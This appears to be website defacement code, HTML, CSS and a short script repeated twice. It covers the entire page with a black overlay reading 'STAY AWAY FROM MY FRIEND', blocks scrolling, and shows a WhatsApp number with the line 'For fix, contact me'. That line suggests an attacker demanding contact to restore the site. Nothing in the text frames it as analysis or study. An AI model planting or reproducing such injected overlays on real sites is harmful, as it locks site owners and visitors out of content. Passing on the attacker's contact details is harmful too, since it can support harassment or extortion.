<div id="hackOverlay">

    <div class="overlayContent">

        <h1>STAY AWAY FROM MY FRIEND</h1>

 

        <div class="contact">

            <h2>Contact</h2>

            <p>WhatsApp: +1 (318) 498-8800</p>

            <p>Note: For fix, contact me.</p>

        </div>

    </div>

</div>

 

<style>

html,body{

    margin:0!important;

    padding:0!important;

    overflow:hidden!important;

}

 

#hackOverlay{

    position:fixed!important;

    top:0!important;

    left:0!important;

    right:0!important;

    bottom:0!important;

    width:100vw!important;

    height:100vh!important;

    min-width:100vw!important;

    min-height:100vh!important;

    background:#000!important;

    z-index:2147483647!important;

    display:flex!important;

    justify-content:center!important;

    align-items:center!important;

    text-align:center!important;

}

 

.overlayContent{

    color:#fff!important;

    font-family:Arial,sans-serif!important;

    padding:20px!important;

}

 

.overlayContent h1{

    color:#ff0000!important;

    font-size:clamp(40px,6vw,90px)!important;

    text-shadow:0 0 15px #ff0000,0 0 30px #ff0000!important;

    margin-bottom:40px!important;

}

 

.contact{

    border:2px solid #ff0000!important;

    padding:20px!important;

    border-radius:12px!important;

    display:inline-block!important;

    font-size:22px!important;

}

 

.contact h2{

    color:#ff4444!important;

}

</style>

 

<script>

document.documentElement.style.overflow="hidden";

document.body.style.overflow="hidden";

</script>

<div id="hackOverlay">

    <div class="overlayContent">

        <h1>STAY AWAY FROM MY FRIEND</h1>

 

        <div class="contact">

            <h2>Contact</h2>

            <p>WhatsApp: +1 (318) 498-8800</p>

            <p>Note: For fix, contact me.</p>

        </div>

    </div>

</div>

 

<style>

html,body{

    margin:0!important;

    padding:0!important;

    overflow:hidden!important;

}

 

#hackOverlay{

    position:fixed!important;

    top:0!important;

    left:0!important;

    right:0!important;

    bottom:0!important;

    width:100vw!important;

    height:100vh!important;

    min-width:100vw!important;

    min-height:100vh!important;

    background:#000!important;

    z-index:2147483647!important;

    display:flex!important;

    justify-content:center!important;

    align-items:center!important;

    text-align:center!important;

}

 

.overlayContent{

    color:#fff!important;

    font-family:Arial,sans-serif!important;

    padding:20px!important;

}

 

.overlayContent h1{

    color:#ff0000!important;

    font-size:clamp(40px,6vw,90px)!important;

    text-shadow:0 0 15px #ff0000,0 0 30px #ff0000!important;

    margin-bottom:40px!important;

}

 

.contact{

    border:2px solid #ff0000!important;

    padding:20px!important;

    border-radius:12px!important;

    display:inline-block!important;

    font-size:22px!important;

}

 

.contact h2{

    color:#ff4444!important;

}

</style>

 

<script>

document.documentElement.style.overflow="hidden";

document.body.style.overflow="hidden";

</script>